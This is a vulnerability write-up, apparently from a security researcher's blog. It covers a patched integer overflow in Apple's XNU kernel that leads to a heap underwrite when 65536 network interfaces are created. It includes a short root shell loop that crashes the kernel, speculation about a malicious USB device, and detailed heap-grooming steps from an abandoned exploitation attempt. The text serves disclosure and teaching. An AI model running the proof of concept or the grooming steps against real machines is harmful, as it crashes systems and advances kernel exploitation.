Adam Doupé
This post describes the second vulnerability that I found in the XNU kernel (the first of which is here). XNU is the operating system kernel used in a number of Apple products, including Macs, iPhones, iPads, Apple Watches, Apple TVs, and so on.
The vulnerability is a 19-year-old heap underwrite vulnerability in XNU’s dlil.c (which handles network interfaces) caused by a (uint16_t) integer overflow in if.c. This can be triggered by a root user creating 65536 total network interfaces.
Root Cause
When an interface is created in ifnet_attach:dlil.c, if_next_index:if.c is called to create an if_index on the ifnet_t ifp:
int idx = if_next_index();
if (idx == -1) {
    ifp->if_index = 0;
    ifnet_lock_done(ifp);
    ifnet_head_done();
    dlil_if_unlock();
    return ENOBUFS;
}
ifp->if_index = (uint16_t)idx; // Vulnerability
This index is cast to a uint16_t.
if_next_index creates one chunk of memory that it splits into two: ifnet_addrs and ifindex2ifnet, and the comments for if_next_index hint at the problem:
“ifnet_addrs[] is indexed by (if_index - 1), whereas ifindex2ifnet[] is indexed by ifp->if_index.”
This means that when 65536 network interfaces are created, the index 65536 is truncated by the cast, so the last interface has an ifp->if_index of 0. ifp->if_index - 1 is then -1, and ifnet_attach will write the allocated struct ifaddr * ifa out of the bounds of ifnet_addrs, one slot before its start:
VERIFY(ifnet_addrs[ifp->if_index - 1] == NULL);
ifnet_addrs[ifp->if_index - 1] = ifa;
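To make the wraparound concrete, here is a minimal user-space sketch (not kernel code) of what the cast does to index 65536 and which ifnet_addrs slot results. The helper names narrow_index and addrs_slot are hypothetical and exist only for illustration.

```c
#include <stdint.h>

/* Hypothetical helper: mimics the (uint16_t) cast in ifnet_attach. */
uint16_t narrow_index(int idx)
{
    return (uint16_t)idx;       /* keeps only the low 16 bits */
}

/* Hypothetical helper: the slot used for ifnet_addrs[if_index - 1]. */
long addrs_slot(uint16_t if_index)
{
    /* if_index is promoted to a signed type, so 0 - 1 is -1. */
    return (long)if_index - 1;
}
```

Under these assumptions, narrow_index(65536) is 0 and addrs_slot(0) is -1, which is one element before the start of the array.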
My Proposed Fix
One fix for the vulnerability would be to limit the number of interfaces that can be created to 0xFFFF. This could be done in if_next_index, and would not impact an interface with the same name (e.g. feth0) that is created and destroyed repeatedly (the only likely scenario for this would be a utun device, which is created when a root or privileged process creates a PF_SYSTEM SYSPROTO_CONTROL socket).
The Real Fix
The real fix here is in if_next_index:
/*
 * Although we are returning an integer,
 * ifnet's if_index is a uint16_t which means
 * that's our upper bound.
 */
if (if_index >= UINT16_MAX) {
    return -1;
}
It seems that we agree on the correct fix (although it’s strange to keep the return value as an int if what you’re returning cannot ever be that large).
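As a rough illustration of how such a bound behaves, the following user-space sketch models an index allocator that refuses to hand out anything above UINT16_MAX. The counter sketch_if_index and the function sketch_if_next_index are hypothetical stand-ins, and the pre-increment is an assumption about how the index advances, not a copy of the kernel code.

```c
#include <stdint.h>

/* Hypothetical stand-in for the kernel's global interface index counter. */
static int sketch_if_index = 0;

/* Returns the next index, or -1 once the uint16_t range is exhausted. */
int sketch_if_next_index(void)
{
    if (sketch_if_index >= UINT16_MAX) {
        return -1;              /* the caller turns this into ENOBUFS */
    }
    return ++sketch_if_index;   /* assumption: indexes start at 1 */
}
```

With this bound, the largest value ever returned is 65535, so the later cast to uint16_t can no longer change the value.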
Affected Versions
Verified on MacOS 13.0 M1 Mac mini running build 22A380.
Also tested on iOS.
From what I can tell, it seems the vulnerable code was introduced in XNU 517.3.7, Mac OSX 10.3.2, released on December 17th, 2003, making it a 19-year-old bug!
Exploitation Conditions
Creating (and destroying) a network interface normally requires root permissions.
POC
This was a super interesting POC to create.
The simplest POC for this fits in a tweet (NOTE: this might crash your machine):
C=$(sysctl -A | grep ifcount | cut -d':' -f2 | xargs)
for i in `seq 32767`
do
    sudo ifconfig "feth$i" create
    sudo ifconfig "feth$i" destroy
done
T=$((65536 - $C - 32767))
for i in `seq $T`
do
    sudo ifconfig "vlan$i" create
    sudo ifconfig "vlan$i" destroy
done
Learning about the destroy after the create was hard-fought knowledge: for the first ~month of trying to POC this bug I only used create. This triggers some exponential slowdown in the kernel, and so creating enough interfaces took several hours (in my VM it would take >12 hours to trigger). Finally I realized that you could destroy the interface and this would fix the slowdown (I also had to learn that the interface info was reused/cached, even if it was deleted, so you couldn’t just create and destroy the same interface type over and over).
However, it’s much faster to trigger the bug in C (by calling the correct ioctl to create and destroy the interfaces).
Here’s the POC that I wrote to trigger this bug, which creates enough interfaces to trigger the integer overflow and the heap underwrite.
If you’re on MacOS 12.6 (last OS that I tested this on), then ~50% of the time your system will crash. This is because there is no memory mapped before ifnet_addrs, and so the write goes to an unmapped page.
Potential Physical Attack
I think it might be possible to trigger this bug through the lightning cable on an iPhone or perhaps USB-C cable on a MacOS machine.
However, Apple (in a great move) now requires you to unlock your device and approve the connection from USB. So, this wouldn’t be possible to do on a locked, pre-first-boot device. However, it might be possible to create a malicious device that tricks the user into plugging in and allowing.
I did not pursue this approach (I really don’t have hardware experience), however the idea would be to create a USB device that pretends to be ~65536 NICs. One downside of this approach is that it takes on the order of hours to create all these interfaces (which is why the POC destroys the interface after it’s created).
I did test that this idea could work by using an old iPhone 6s running iOS 12.1, with the checkra1n beta 0.12.4 jailbreak.
On first boot, I plugged in a lightning to ethernet adapter, and it actually created three new interfaces: en3 (the ethernet device), EHC1, and OHC2 (no idea what those are).
So this might be possible, and I would love to know if anyone’s able to do this.
My Failed Exploit Attempt
While creating a POC in MacOS 12.5 I tried a ton to create a POC that could alter the struct ifaddr * ifa that was underwritten, by controlling something that was allocated before ifnet_addrs and then modifying that pointer.
The spoiler alert here is that I failed: I was very close (as I’ll try to lay out here) but was stuck on how to flip bits in the pointer without crashing or triggering an infinite loop. Then, MacOS 12.6 dropped, which changed the behavior of the kernel’s memory allocator so the POC crashed 50% of the time. I decided I had spent enough of my life on this bug (about two months of dedicated effort), so I sent the basic POC to Apple and here we are.
I hope that maybe you can learn something from my failed approach.
Anyway, it seems like this should be easy: use the standard trick of spraying a bunch of Out-Of-Line Mach Messages, trigger the underwrite, read the messages to see which one was overwritten, then use that to change/alter the pointer.
O, dear reader, it was not so easy.
The first thing to understand is how ifnet_addrs is allocated: if_next_index carves it out of a single chunk of memory that holds both arrays, and this chunk is doubled every time the limit is hit:
if (ifnet_addrs == NULL) {
    new_if_indexlim = INITIAL_IF_INDEXLIM;
} else {
    new_if_indexlim = if_indexlim << 1;
}
/* allocate space for the larger arrays */
n = (2 * new_if_indexlim + 1);
new_ifnet_addrs = (caddr_t)kalloc_type(caddr_t, n, Z_WAITOK | Z_ZERO);
This means that n gets larger and larger, so we need to allocate 0x8000 interfaces first, and the next one will trigger the allocation of the final location of ifnet_addrs.
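The growth rule can be turned into a quick size calculation. This is a user-space sketch only: it assumes 8-byte pointers (64-bit macOS and iOS), and the function names and the start value passed to indexlim_after_doubling are hypothetical, since the value of INITIAL_IF_INDEXLIM is not shown here.

```c
#include <stdint.h>

/* Assumption: 8-byte pointers, as on 64-bit macOS and iOS. */
#define SKETCH_PTR_SIZE 8u

/* Bytes requested for a given index limit: n = 2 * lim + 1 pointers. */
uint64_t ifnet_arrays_bytes(uint64_t indexlim)
{
    return (2 * indexlim + 1) * SKETCH_PTR_SIZE;
}

/* Smallest limit reached by doubling from `initial` that is >= `needed`. */
uint64_t indexlim_after_doubling(uint64_t initial, uint64_t needed)
{
    uint64_t lim = (initial == 0) ? 1 : initial;  /* avoid looping on 0 */
    while (lim < needed) {
        lim <<= 1;
    }
    return lim;
}
```

Under these assumptions, a limit of 0x8000 asks for 524,296 bytes, while the final limit of 0x10000 asks for 1,048,584 bytes, which is just over 1MB (0x100000 bytes).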
For allocations larger than KHEAP_MAX_SIZE, kalloc_type will call into kalloc_large.
#if !defined(__LP64__)
#define KHEAP_MAX_SIZE 8 * 1024
#elif __x86_64__
#define KHEAP_MAX_SIZE 16 * 1024
#else
#define KHEAP_MAX_SIZE 32 * 1024
#endif
So, we should be able to allocate any object into kalloc_large if it’s over say 0x8000 in size (this way it’s applicable in all the platforms).
Oh if only things were that easy/simple.
Turns out that kalloc_large works by calling into kernel_memory_allocate to allocate a page of memory directly from the VM system, which means that this is essentially above the kernel heap allocation layer.
kernel_memory_allocate eventually calls vm_map_find_space, which then calls vm_map_locate_space.
vm_map_get_range then gets the range from a global variable called kmem_ranges based on flags that are passed all the way:
kmem_range_id_t range_id = vmk_flags->vmkf_range_id;
effective_range = kmem_ranges[range_id];
However, there’s also a check later in vm_map_get_range to see if the size is greater than KMEM_SMALLMAP_THRESHOLD (which is 1MB on 64-bit platforms):
if (size >= KMEM_SMALLMAP_THRESHOLD) {
    effective_range = kmem_large_ranges[range_id];
}
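Putting the two thresholds together, an allocation ends up on one of three paths. The sketch below is a simplified user-space model of that decision, not kernel code: the enum, the macro names, and classify_alloc are hypothetical, and the constants are the arm64 KHEAP_MAX_SIZE and the 1MB threshold quoted above.

```c
#include <stddef.h>

#define SKETCH_KHEAP_MAX_SIZE     (32u * 1024u)     /* arm64 value quoted above */
#define SKETCH_SMALLMAP_THRESHOLD (1024u * 1024u)   /* 1MB on 64-bit platforms */

enum sketch_alloc_path {
    SKETCH_KALLOC_HEAP,         /* served by the regular kernel heap */
    SKETCH_LARGE_KMEM_RANGES,   /* kalloc_large, range from kmem_ranges */
    SKETCH_LARGE_KMEM_LARGE     /* kalloc_large, range from kmem_large_ranges */
};

/* Classifies a request size according to the two thresholds. */
enum sketch_alloc_path classify_alloc(size_t size)
{
    if (size <= SKETCH_KHEAP_MAX_SIZE) {
        return SKETCH_KALLOC_HEAP;
    }
    if (size >= SKETCH_SMALLMAP_THRESHOLD) {
        return SKETCH_LARGE_KMEM_LARGE;
    }
    return SKETCH_LARGE_KMEM_RANGES;
}
```

In this model a request of exactly 1MB or more always lands in the kmem_large_ranges path, so a victim object has to cross the same threshold to share a range with such an allocation.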
These ranges are quite different, as shown from an lldb debug session that I had:
(lldb) print kmem_large_ranges
(kmem_range [4]) $4 = {
[KMEM_RANGE_ID_NONE] = (min_address = 0x0000000000000000, max_address = 0x0000000000000000)
[KMEM_RANGE_ID_PTR_0] = (min_address = 0xfffffff35b14b000, max_address = 0xfffffffee9aa1000)
[KMEM_RANGE_ID_PTR_1] = (min_address = 0xffffffe625d7b000, max_address = 0xfffffff1b46d1000)
[KMEM_RANGE_ID_DATA] = (min_address = 0xffffffa7100a6000, max_address = 0xffffffd54a5fe000)
}
(lldb) print kmem_ranges
(kmem_range [4]) $1 = {
[KMEM_RANGE_ID_NONE] = (min_address = 0x0000000000000000, max_address = 0x0000000000000000)
[KMEM_RANGE_ID_PTR_0] = (min_address = 0xfffffff287c0e000, max_address = 0xffffffffbcfde000)
[KMEM_RANGE_ID_PTR_1] = (min_address = 0xffffffe55283e000, max_address = 0xfffffff287c0e000)
[KMEM_RANGE_ID_DATA] = (min_address = 0xffffffa0756be000, max_address = 0xffffffd54a5fe000)
}
So, this explains why we couldn’t use OOL Mach messages (I tried them twice I think): due to some limit that I can’t find right now we can’t allocate an OOL Mach Message that’s > 1MB.
To make matters worse, we need our victim allocation to end up in KMEM_RANGE_ID_PTR_0 in kmem_large_ranges (which, empirically, is where ifnet_addrs ended up).
(I learned a lot about the importance of keeping notes while trying exploitation. I didn’t keep track of all of these limits, so I wasted lots of time trying different exploitation methods while eventually rediscovering them.)
I then did what any good hacker does: look at every single allocation site in the kernel (using IDA this time on a debug kernel) to see ones that were unbounded.
But now we need to define what our goal here is: we want the victim object to be allocated directly before the vulnerable object (ifnet_addrs), so that the underwrite changes the last 8 bytes of the victim object.
So, it needs:
- An allocation that we can control/trigger from userspace.
- An allocation that persists (no thank you race conditions, not today).
- An allocation that is greater than 1MB (the fun KMEM_SMALLMAP_THRESHOLD).
- An allocation that falls into KMEM_RANGE_ID_PTR_0.
- An allocation where the object size (i.e. the space that we can use) is a multiple of the page size: We need to be able to read or write to the last 8 bytes of the allocation.
Note that I didn’t start with this list, but only ended up here after following multiple dead ends and false starts.
Finally, I found something promising in kern_descrip.c’s fdalloc:
newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE,
Z_WAITOK);
The SUPER weird thing here is that OFILESIZE is NINE (9) BYTES! Why why why, such a weird allocation pattern!
And it starts out at a strange initial size that’s difficult to determine, so I created this table (note that it’s allocation size, not number of objects) to see when it would be page divisible (I like to do this in an org-mode table where I keep my notes):
| Allocation (hex)  | Allocation (dec)  | Size / page (0x1000)   |
|-------------------+-------------------+------------------------|
| 0x1518 | 5400 | 1.3183594 |
| 0x2a30 | 10800 | 2.6367188 |
| 0x5460 | 21600 | 5.2734375 |
| 0xa8c0 | 43200 | 10.546875 |
| 0x15180 | 86400 | 21.09375 |
| 0x2A300 | 172800 | 42.1875 |
| 0x54600 | 345600 | 84.375 |
| 0xA8C00 | 691200 | 168.75 |
| 0x151800 | 1382400 | 337.5 |
| 0x2A3000 | 2764800 | 675 |
| 0x546000 | 5529600 | 1350 |
| 0xA8C000 | 11059200 | 2700 |
So we need there to be 0x2A3000 / 9 = 0x4B000 numfiles here. But what are those numfiles you ask?
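The table lookup can also be done mechanically. The sketch below doubles a starting size until it is both a multiple of the page size and at least a minimum size; the function name is hypothetical, and the doubling rule is simply the pattern visible in the table, not something taken from the kernel source.

```c
#include <stdint.h>

/*
 * Doubles `bytes` until it is a multiple of `page` and at least `min_bytes`.
 * Returns 0 for a zero start size or a zero page size.
 */
uint64_t first_usable_table_bytes(uint64_t bytes, uint64_t page, uint64_t min_bytes)
{
    if (bytes == 0 || page == 0) {
        return 0;
    }
    while (bytes % page != 0 || bytes < min_bytes) {
        bytes <<= 1;
    }
    return bytes;
}
```

Starting from 5400 bytes with a 0x1000 page and a 1MB minimum, this arrives at 0x2A3000 bytes, which at 9 bytes per entry is 0x4B000 entries.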
Turns out that we’re looking at the kernel’s storage of a process’s fds!
Oh no, can we create 0x4B000 fds in a process?
Yes, if we are root, there are two limits that control this and we can just bump them right up:
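ulimit -n unlimited  # run from a root shell: ulimit is a shell builtin, so 'sudo ulimit' would not change the calling shell's limit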
sudo sysctl -w kern.maxfilesperproc=614400
The cool thing is that we can actually use dup2 to specify a (large) wanted fd (second argument to dup2) and the kernel will allocate all this memory for us!
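A minimal user-space sketch of the dup2 trick follows. It is not the POC: the function name occupy_fd is hypothetical, it only adjusts the soft RLIMIT_NOFILE (raising the hard limit and kern.maxfilesperproc is assumed to have been done separately), and it uses /dev/null as an arbitrary file to duplicate.

```c
#include <fcntl.h>
#include <sys/resource.h>
#include <unistd.h>

/*
 * Duplicates a descriptor for /dev/null onto `target_fd`, raising the soft
 * RLIMIT_NOFILE first if needed. Returns target_fd on success, -1 on error.
 */
int occupy_fd(int target_fd)
{
    struct rlimit rl;

    if (target_fd < 0 || getrlimit(RLIMIT_NOFILE, &rl) != 0) {
        return -1;
    }
    if (rl.rlim_cur <= (rlim_t)target_fd) {
        rlim_t wanted = (rlim_t)target_fd + 1;
        if (rl.rlim_max != RLIM_INFINITY && wanted > rl.rlim_max) {
            return -1;          /* hard limit too low for this fd */
        }
        rl.rlim_cur = wanted;
        if (setrlimit(RLIMIT_NOFILE, &rl) != 0) {
            return -1;
        }
    }

    int src = open("/dev/null", O_RDONLY);
    if (src < 0) {
        return -1;
    }
    if (src == target_fd) {
        return target_fd;       /* already sitting on the wanted fd */
    }
    int fd = dup2(src, target_fd);  /* the fd table must grow to hold target_fd */
    close(src);
    return fd;
}
```

A single call such as occupy_fd(307199) is enough to make the process need a table with 0x4B000 entries, provided the limits allow it.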
Through trial, error, and debugging (dtrace ftw) I found an allocation pattern of fds that put things where we want:
- Allocate three smaller fd tables first (to fill up first rather than after) using an fd of 153599.
- Allocate 0x2A3000 / 9 = 0x4B000 fds in one proc by calling dup2 with an fd of 307199. This will be the victim proc’s fd table.
- Allocate one smaller fd table of 0x151800 / 9 = 0x25800 fds in each of the other procs. These are only needed as spacing to take up room (as many as needed) so that the target allocation will go after the victim. This is needed because of the “realloc” behavior that goes on when we allocate the victim.
- Trigger underwrite.
At this point, we can allocate a victim object in the correct region, we can allocate the vulnerable object after, then we can underwrite to write into it.
Success?
Oh no, now what do we control in this newofiles array?
Later on in fdalloc we find:
newofileflags = (char *) &newofiles[numfiles];
// ...
(void) memcpy(newofiles, fdp->fd_ofiles,
    oldnfiles * sizeof(*fdp->fd_ofiles));
// ...
(void) memcpy(newofileflags, fdp->fd_ofileflags,
    oldnfiles * sizeof(*fdp->fd_ofileflags));
So now we can see why the allocation size here is 9 bytes: 8 bytes for a pointer (what fdp->fd_ofiles consists of) and 1 byte for fdp->fd_ofileflags, which is the (single byte) flag for the file.
And, to make matters worse, the flags go at the end of newofiles, which is where the underwrite happens (my kingdom for a pointer overlap).
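The layout can be checked with a little offset arithmetic. This sketch assumes 8-byte pointers and the layout described above (all pointers first, then one flag byte per fd); the function names are hypothetical.

```c
#include <stddef.h>

#define SKETCH_FILEPTR_SIZE 8u  /* assumption: 8-byte pointers */

/* Byte offset at which the flag bytes start inside the allocation. */
size_t flags_offset(size_t numfiles)
{
    return numfiles * SKETCH_FILEPTR_SIZE;
}

/*
 * Returns the fd whose flag byte lives at byte `offset`, or (size_t)-1 if
 * the offset falls in the pointer array or outside the allocation.
 */
size_t fd_for_flag_offset(size_t numfiles, size_t offset)
{
    size_t start = flags_offset(numfiles);

    if (offset < start || offset >= start + numfiles) {
        return (size_t)-1;
    }
    return offset - start;
}
```

For a table of 0x4B000 entries (0x2A3000 bytes), the flags start at offset 0x258000, and the last 8 bytes of the allocation are the flag bytes of fds 0x4AFF8 through 0x4AFFF, so an 8-byte write there lands entirely in flags rather than in a file pointer.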
Here are the flags that matter:
#define UF_RESERVED 0x04 /* open pending / in progress */
#define UF_CLOSING 0x08 /* close in progress */
#define UF_RESVWAIT 0x10 /* close in progress */
#define UF_INHERIT 0x20 /* "inherit-on-exec" */
I spent a ton of time trying to find a way to flip bits in the pointer using these flags.
Ultimately I gave up, sent what I had to Apple, and moved on to the next bug (but I did learn a lot in the process).
Then, I saw this awesome blog post by Jack Dates from Ret2 Systems talking about how to corrupt from kalloc_large and kernel_map.
Hope this was enlightening, or maybe you can empathize with my plight (it seems that us hackers rarely talk about our failures).